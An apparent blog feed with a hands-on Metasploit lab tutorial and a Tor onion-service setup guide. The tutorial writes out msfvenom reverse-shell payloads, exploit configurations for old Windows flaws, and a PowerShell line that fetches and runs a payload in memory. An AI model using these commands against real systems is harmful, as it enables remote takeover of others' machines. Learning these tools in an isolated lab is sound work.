{"title":"axju - security","link":[{"@attributes":{"href":"https:\/\/axju.de\/","rel":"alternate"}},{"@attributes":{"href":"https:\/\/axju.de\/feeds\/security.atom.xml","rel":"self"}}],"id":"https:\/\/axju.de\/","updated":"2021-07-30T20:15:00+02:00","subtitle":"Just coding stuff","entry":[{"title":"Metasploit","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/07\/metasploit\/","rel":"alternate"}},"published":"2021-07-30T20:15:00+02:00","updated":"2021-07-30T20:15:00+02:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-07-30:\/posts\/2021\/07\/metasploit\/","summary":"<p class=\"first last\">Fun with Metasploit, aka How To Hack<\/p>\n","content":"<p>I am a software developer, not a security researcher. But it is still\nimportant to understand current security principles. Of course you can read all\nabout it, but it is more fun to try it out. Back in the day I already played\nwith some penetration testing tools on\n<a class=\"reference external\" href=\"https:\/\/en.wikipedia.org\/wiki\/BackTrack\">BackTrack<\/a>.\nMostly I hacked someone's WLAN, or stuff like this.<\/p>\n<p>Now it's time to play with Metasploit. I won't go into too much detail; I just\ntry it out and present the results.<\/p>\n<div class=\"section\" id=\"the-basics\">\n<h2>The Basics<\/h2>\n<p>There are a lot of tools to have fun with security; we are going to use\nMetasploit. You can install it on most systems, but I work with Kali for\nany security task I have. 
By the way, I run Kali in\n<a class=\"reference external\" href=\"https:\/\/www.virtualbox.org\">VirtualBox<\/a>,\nwhich I also use for my vulnerable targets. Keep the targets on an isolated\nhost-only network; they are unpatched on purpose.<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/www.kali.org\/get-kali\/#kali-virtual-machines\">Kali<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/developer.microsoft.com\/en-us\/microsoft-edge\/tools\/vms\/#downloads\">Windows 10\/8\/7<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/developer.microsoft.com\/de-de\/windows\/downloads\/virtual-machines\/\">Windows 10 Development environment<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/isoriver.com\/windows-xp-iso-download\/\">Windows XP<\/a> (unofficial mirror, so treat the image as untrusted)<\/li>\n<\/ul>\n<\/blockquote>\n<p>The basic steps for exploiting a system are:<\/p>\n<blockquote>\n<ol class=\"arabic simple\">\n<li><dl class=\"first docutils\">\n<dt>Choosing and configuring an exploit<\/dt>\n<dd>Code that enters a target system by taking advantage of one of its bugs.<\/dd>\n<\/dl>\n<\/li>\n<li><dl class=\"first docutils\">\n<dt>Choosing and configuring a payload<\/dt>\n<dd>Code that will be executed on the target system upon successful entry.\nMostly this will be a remote shell.<\/dd>\n<\/dl>\n<\/li>\n<li><dl class=\"first docutils\">\n<dt>Executing the exploit<\/dt>\n<dd>The exploit delivers the payload; if it works, the handler on your machine\nreceives the connection and gives you a session.<\/dd>\n<\/dl>\n<\/li>\n<\/ol>\n<\/blockquote>\n<\/div>\n<div class=\"section\" id=\"example-0x01-revers-shell\">\n<h2>Example 0x01 - Reverse Shell<\/h2>\n<p>You can create an executable file that connects back to your machine. Almost any\nantivirus scanner will detect this file, because the plain msfvenom output is\nwell known and signature-detected. But let us use it for the first try anyway.\nYou may need to turn off your antivirus. As you can see in the video,\nWindows also detects and deletes this file, even though I had switched off\nWindows Defender. 
This is the final result; all commands are below the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-001.gif\" style=\"width: 100%;\" \/>\n<p>First we create the executable:<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfvenom -p windows\/meterpreter\/reverse_tcp <span class=\"nv\">LHOST<\/span><span class=\"o\">=<\/span><span class=\"m\">192<\/span>.168.178.41 <span class=\"nv\">LPORT<\/span><span class=\"o\">=<\/span><span class=\"m\">5555<\/span> -f exe &gt; shell.exe\n<\/pre><\/div>\n<p>Run a web server with Python to copy the file to the target:<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ python3 -m http.server\n<\/pre><\/div>\n<p>Now you can download the file on the target. Before we execute it, we have to\nset up Metasploit, because the handler must already be listening when the file\nconnects back. Open Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/multi\/handler\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; run\n<\/pre><\/div>\n<p>Now execute the file on the target device. PAYLOAD, LHOST and LPORT must match\nthe values baked into the executable with msfvenom, otherwise the handler cannot\ntalk to the stager.<\/p>\n<\/div>\n<div class=\"section\" 
id=\"example-0x02-internet-explorer-6\">\n<h2>Example 0x02 - Internet Explorer 6<\/h2>\n<p>You can see from the previous example: if your system is up to date, it is hard\nto get an existing exploit to work. Now we will use something old and slow:\nInternet Explorer 6, the old one from Windows XP.<\/p>\n<p>This is also a more realistic example. There is a program with a critical\nsecurity flaw, and if the user feeds it the wrong data, you can take over the\nsystem. For this exploit: take Internet Explorer 6 and visit the wrong URL. The\nmodule serves the malicious page itself, so Metasploit also plays the web\nserver here (that is what SRVHOST, SRVPORT and URIPATH configure).<\/p>\n<p>This is how it looks; the commands are under the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-002.gif\" style=\"width: 100%;\" \/>\n<p>Start Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/windows\/browser\/ms10_002_aurora\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> SRVHOST <span 
class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">SRVHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> SRVPORT <span class=\"m\">80<\/span>\n<span class=\"nv\">SRVPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">80<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> URIPATH \/\n<span class=\"nv\">URIPATH<\/span> <span class=\"o\">=<\/span>&gt; \/\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; exploit\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Exploit running as background job <span class=\"m\">0<\/span>.\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Exploit completed, but no session was created.\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt;\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Using URL: http:\/\/192.168.178.41:80\/\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Server started.\n<\/pre><\/div>\n<p>If you now visit  <a class=\"reference external\" href=\"http:\/\/192.168.178.41\/\">http:\/\/192.168.178.41\/<\/a> with Internet Explorer, you should see\nsomething like:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer <span class=\"s2\">&quot;Aurora&quot;<\/span> Memory Corruption\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span class=\"o\">(<\/span><span class=\"m\">175174<\/span> bytes<span 
class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.45\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45:1046<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">04<\/span>:33:54 -0400\n<\/pre><\/div>\n<p>You can now interact with the session:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; sessions -l\n\nActive <span class=\"nv\">sessions<\/span>\n<span class=\"o\">===============<\/span>\n\n  Id  Name  Type                     Information                            Connection\n  --  ----  ----                     -----------                            ----------\n  <span class=\"m\">1<\/span>         meterpreter x86\/windows  AXJU-5980144708<span class=\"se\">\\a<\/span>xju @ AXJU-598014470  <span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45\n                                     <span class=\"m\">8<\/span>                                      :1046 <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.45<span class=\"o\">)<\/span>\n\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; sessions -i <span class=\"m\">1<\/span>\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Starting interaction with <span class=\"m\">1<\/span>...\n\nmeterpreter &gt; sysinfo\nComputer        : AXJU-5980144708\nOS              : Windows XP <span class=\"o\">(<\/span><span class=\"m\">5<\/span>.1 Build <span class=\"m\">2600<\/span>, Service Pack <span class=\"m\">3<\/span><span class=\"o\">)<\/span>.\nArchitecture    : x86\nSystem Language : en_US\nDomain          : WORKGROUP\nLogged On Users : <span class=\"m\">2<\/span>\nMeterpreter     : 
x86\/windows\nmeterpreter &gt;\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"example-0x03-windows-xp\">\n<h2>Example 0x03 - Windows XP<\/h2>\n<p>We're still on Windows XP, but now we target a service that runs in the\nbackground. The user doesn't have to do anything and we can still take over the\nsystem. Again the final result first; the commands are below:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-003.gif\" style=\"width: 100%;\" \/>\n<p>Start Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/windows\/smb\/ms08_067_netapi\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> RHOST <span class=\"m\">192<\/span>.168.178.45\n<span class=\"nv\">RHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.45\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; exploit\n<\/pre><\/div>\n<p>Now you should see something 
like:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Automatically detecting the target...\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Fingerprint: Windows XP - Service Pack <span class=\"m\">3<\/span> - lang:English\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Selected Target: Windows XP SP3 English <span class=\"o\">(<\/span>AlwaysOn NX<span class=\"o\">)<\/span>\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Attempting to trigger the vulnerability...\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span class=\"o\">(<\/span><span class=\"m\">175174<\/span> bytes<span class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.45\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45:1038<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">04<\/span>:14:41 -0400\n\nmeterpreter &gt;\n<\/pre><\/div>\n<p>And that is all: you now have control over the target system, without the user\nclicking anything. See how dangerous an unpatched Windows XP is?<\/p>\n<\/div>\n<div class=\"section\" id=\"example-0x04-python\">\n<h2>Example 0x04 - Python<\/h2>\n<p>Of course there are also more complex ways of executing code on the target\nsystem. This example is similar to the first: the user has to execute a command,\nwhich loads the code and runs it with Python. We assume that Python is installed on\nthe target. 
Since the payload is loaded directly into memory and never written to disk as\nan executable, we can use Windows 10 again, and Windows Defender can also stay\nenabled.<\/p>\n<p>You know the drill: scroll down for the commands or enjoy the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-004.gif\" style=\"width: 100%;\" \/>\n<div class=\"highlight\"><pre><span><\/span>$ msfvenom -p python\/meterpreter\/reverse_tcp  <span class=\"nv\">LHOST<\/span><span class=\"o\">=<\/span><span class=\"m\">192<\/span>.168.178.41 <span class=\"nv\">LPORT<\/span><span class=\"o\">=<\/span><span class=\"m\">5555<\/span> -f raw &gt; shell.py\n$ python3 -m http.server\n<\/pre><\/div>\n<p>Now we quickly configure Metasploit:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/multi\/handler\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD python\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; python\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; exploit\n\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span 
class=\"o\">(<\/span><span class=\"m\">39392<\/span> bytes<span class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.42\n<\/pre><\/div>\n<p>On the target we open PowerShell and execute:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">(<\/span>new-object net.webclient<span class=\"o\">)<\/span>.DownloadString<span class=\"o\">(<\/span><span class=\"s1\">&#39;http:\/\/192.168.178.41:8000\/shell.py&#39;<\/span><span class=\"o\">)<\/span> <span class=\"p\">|<\/span> python\n<\/pre><\/div>\n<p>This downloads the Python script and pipes it straight into the interpreter,\nso no file ever touches the disk. Now you have access to the target system with\nMetasploit:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.42:49636<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">05<\/span>:30:28 -0400\n\nmeterpreter &gt;\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"conclusion\">\n<h2>Conclusion<\/h2>\n<p>This is fun. I enjoy playing with some security tools. 
And knowing the issues other programs have had will make you write better\nsource code.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"hacking"}},{"@attributes":{"term":"metasploit"}},{"@attributes":{"term":"reverse shell"}}]},{"title":"Hidden Service","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/02\/hidden-service\/","rel":"alternate"}},"published":"2021-02-26T20:15:00+01:00","updated":"2021-02-26T20:15:00+01:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-02-26:\/posts\/2021\/02\/hidden-service\/","summary":"<p class=\"first last\">Set up a hidden service on the darknet<\/p>\n","content":"<p>I want to know how to set up a hidden service on the Tor network, aka the\ndarknet. The goal is to have a copy of this blog on the darknet. Check out the\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\">Tor project<\/a> to learn more about the darknet. I\nwill only explain how to set up a hidden service, not the darknet itself.<\/p>\n<p><strong>Tor project:<\/strong> <em>We believe everyone should be able to explore the internet with\nprivacy. We are the Tor Project, a 501(c)3 US nonprofit. We advance human rights\nand defend your privacy online through free software and open networks.<\/em>\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\/about\/people\/\">Meet our team.<\/a><\/p>\n<p>Now that you know what the Tor project is, you already have the\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\/download\/\">Tor browser<\/a> and can now read\n<a class=\"reference external\" href=\"http:\/\/z3wkaghfy4cmuqcrgskpvdava55qsbfrz5vvqthuemv2cktuwxvztcyd.onion\/\">my blog on the darknet<\/a>,\ngreat. But how do I create the hidden service for my blog? That was surprisingly\neasy. It only takes a few steps. 
The\n<a class=\"reference external\" href=\"https:\/\/community.torproject.org\/onion-services\/setup\/\">official documentation<\/a>\nis quite good; read it and have some fun. It was so simple that I also want to\ncreate an example Django project behind a hidden service. That is just an\nexample and should work with all WSGI apps.<\/p>\n<div class=\"section\" id=\"install-tor\">\n<h2>Install tor<\/h2>\n<div class=\"highlight\"><pre><span><\/span>sudo apt-get install tor\n<\/pre><\/div>\n<p>You can check if the service is running<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl status tor.service\nsudo systemctl status tor@default.service\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"nginx\">\n<h2>Nginx<\/h2>\n<p>I built this blog with Pelican, a static site generator. Therefore Nginx only\nhas to serve some static HTML files.<\/p>\n<p>First install Nginx<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo apt install nginx\n<\/pre><\/div>\n<p>Then delete the Nginx default site<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo rm \/etc\/nginx\/sites-enabled\/*\n<\/pre><\/div>\n<p>Create the server file for my blog<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/nginx\/sites-available\/axju\n<\/pre><\/div>\n<p>with<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"k\">server<\/span> <span class=\"p\">{<\/span>\n  <span class=\"kn\">listen<\/span> <span class=\"mi\">80<\/span> <span class=\"s\">default_server<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">listen<\/span> <span class=\"s\">[::]:80<\/span> <span class=\"s\">default_server<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">server_name<\/span> <span class=\"s\">_<\/span><span class=\"p\">;<\/span>\n\n  <span class=\"kn\">root<\/span> <span class=\"s\">\/var\/www\/axju<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">index<\/span> <span class=\"s\">index.html<\/span><span class=\"p\">;<\/span>\n  <span 
class=\"kn\">location<\/span> <span class=\"s\">\/<\/span> <span class=\"p\">{<\/span>\n    <span class=\"kn\">try_files<\/span> <span class=\"nv\">$uri<\/span> <span class=\"nv\">$uri\/<\/span> <span class=\"p\">=<\/span><span class=\"mi\">404<\/span><span class=\"p\">;<\/span>\n  <span class=\"p\">}<\/span>\n<span class=\"p\">}<\/span>\n<\/pre><\/div>\n<p>Create the www folder for the HTML files<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"k\">mkdir<\/span> <span class=\"s\">\/var\/www\/axju<\/span>\n<\/pre><\/div>\n<p>I copied my files into this folder. Now enable the site and restart Nginx<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo ln -s \/etc\/nginx\/sites-available\/axju \/etc\/nginx\/sites-enabled\/\nsudo systemctl restart nginx\n<\/pre><\/div>\n<p>Note that this server block listens on all interfaces. On a machine that also\nhas a public address, bind Nginx to the loopback interface only (listen\n127.0.0.1:80;) or firewall port 80; otherwise the same content is reachable on\nthe clearnet and the onion address can be linked to your server.<\/p>\n<\/div>\n<div class=\"section\" id=\"config-tor\">\n<h2>Config Tor<\/h2>\n<p>Create a folder for the Tor service<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo mkdir \/var\/lib\/tor\/axju\/\nsudo chmod <span class=\"m\">700<\/span> \/var\/lib\/tor\/axju\n<\/pre><\/div>\n<p>This folder will later contain some important files for your service, like the\nhostname and the private key. Tor checks that the directory is not readable by\nothers and that it belongs to the user Tor runs as (debian-tor on Debian and\nUbuntu), so change the owner if Tor refuses to start. Whoever obtains the\nprivate key can impersonate your onion address, so protect it like any other\nprivate key. Now open the configuration<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/tor\/torrc\n<\/pre><\/div>\n<p>and add these two lines<\/p>\n<div class=\"highlight\"><pre><span><\/span>HiddenServiceDir \/var\/lib\/tor\/axju\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:80\n<\/pre><\/div>\n<p>Your service should be available after a restart<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl restart tor\n<\/pre><\/div>\n<p>Get the hostname with<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo cat \/var\/lib\/tor\/axju\/hostname\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"extra-bind-a-wsgi-app\">\n<h2>Extra - bind a WSGI app<\/h2>\n<p>It was so simple that I need something challenging. 
I'm going to show you how to\nset up a Django project behind a hidden service. You should already know Django.<\/p>\n<div class=\"section\" id=\"setup-django\">\n<h3>1. Setup Django<\/h3>\n<p>Install requirements<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo apt install python3-pip python3-venv\n<\/pre><\/div>\n<p>Create a new folder<\/p>\n<div class=\"highlight\"><pre><span><\/span>mkdir myproject\n<span class=\"nb\">cd<\/span> myproject\n<\/pre><\/div>\n<p>Set up a new Django project with a virtual environment<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 -m venv venv\n<span class=\"nb\">source<\/span> venv\/bin\/activate\npip install django gunicorn\ndjango-admin startproject myproject .\n<\/pre><\/div>\n<p>Change the project settings just a bit<\/p>\n<div class=\"highlight\"><pre><span><\/span>nano myproject\/settings.py\n<\/pre><\/div>\n<p>Change only the line with the allowed hosts<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"nv\">ALLOWED_HOSTS<\/span> <span class=\"o\">=<\/span> <span class=\"o\">[<\/span><span class=\"s1\">&#39;*&#39;<\/span><span class=\"o\">]<\/span>\n<\/pre><\/div>\n<p>The wildcard accepts any Host header, which is fine for this experiment. For a\nreal service put your .onion hostname into the list instead, so that Django\nrejects requests with a forged Host header.<\/p>\n<\/div>\n<div class=\"section\" id=\"change-the-tor-config\">\n<h3>2. 
Change the Tor config<\/h3>\n<p>Open the file<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/tor\/torrc\n<\/pre><\/div>\n<p>and change the hidden service port from<\/p>\n<div class=\"highlight\"><pre><span><\/span>...\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:80\n<\/pre><\/div>\n<p>to<\/p>\n<div class=\"highlight\"><pre><span><\/span>...\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:8000\n<\/pre><\/div>\n<p>Restart Tor<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl restart tor\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"run-gunicorn\">\n<h3>3. Run gunicorn<\/h3>\n<p>Run gunicorn to bind the WSGI app<\/p>\n<div class=\"highlight\"><pre><span><\/span>gunicorn --bind <span class=\"m\">127<\/span>.0.0.1:8000 myproject.wsgi\n<\/pre><\/div>\n<p>Of course this is just an example. If you set up a real service, you will use\na systemd service or something similar. Keep the bind address at 127.0.0.1: Tor\nforwards the requests locally, and the app must not be reachable from the\noutside.<\/p>\n<\/div>\n<\/div>\n<div class=\"section\" id=\"final-notes\">\n<h2>Final notes<\/h2>\n<p>Yes, that was easy, and yes, you have to do more to hide your service.<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/riseup.net\/en\/security\/network-security\/tor\/onionservices-best-practices\">Onion services best practices<\/a> by Riseup Collective<\/li>\n<li><a class=\"reference external\" href=\"https:\/\/community.torproject.org\/onion-services\/advanced\/opsec\/\">Operational Security<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>I also set up Jenkins to automate the publishing. The darknet copy of this blog\nwill always be a little bit newer than the main build. 
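<\/p>\n<p>The ALLOWED_HOSTS = ['*'] line from step 1 accepts any Host header. What follows is an added example, not the post's own code: it reads the hostname Tor wrote into the HiddenServiceDir used above, checks that it is a well-formed v3 onion address, and builds an ALLOWED_HOSTS list from it. The host matching function is a simplified re-implementation of Django's rule (exact name, a leading dot for a domain and its subdomains, or the wildcard) so that you can see what the wildcard lets through; the onion address in the demo is this blog's mirror as given in the post, the other hostnames are constructed. The hostname file belongs to the Tor user, so give the Django process read access to a copy rather than relaxing the permissions of the service directory.<\/p>

```python
import re
from pathlib import Path

# Added example, not the post's own code. Assumed path: the HiddenServiceDir
# used in this post. Django itself is not imported; host_allowed() is a
# simplified re-implementation of its ALLOWED_HOSTS matching.
HOSTNAME_FILE = '/var/lib/tor/axju/hostname'

# v3 onion address: 56 base32 characters (a-z, 2-7) followed by ".onion"
V3_ONION = re.compile(r'^[a-z2-7]{56}\.onion$')


def is_v3_onion(name):
    """True if name is a well-formed v3 onion address."""
    return V3_ONION.match(name.strip().lower()) is not None


def parse_hostname_file(text):
    """Validate the content of Tor's hostname file and return the address."""
    name = text.strip().lower()
    if not is_v3_onion(name):
        raise ValueError(f'not a v3 onion address: {name!r}')
    return name


def read_onion_hostname(path=HOSTNAME_FILE):
    """Read and validate the hostname Tor generated for the service."""
    return parse_hostname_file(Path(path).read_text())


def allowed_hosts_for(hostname_text):
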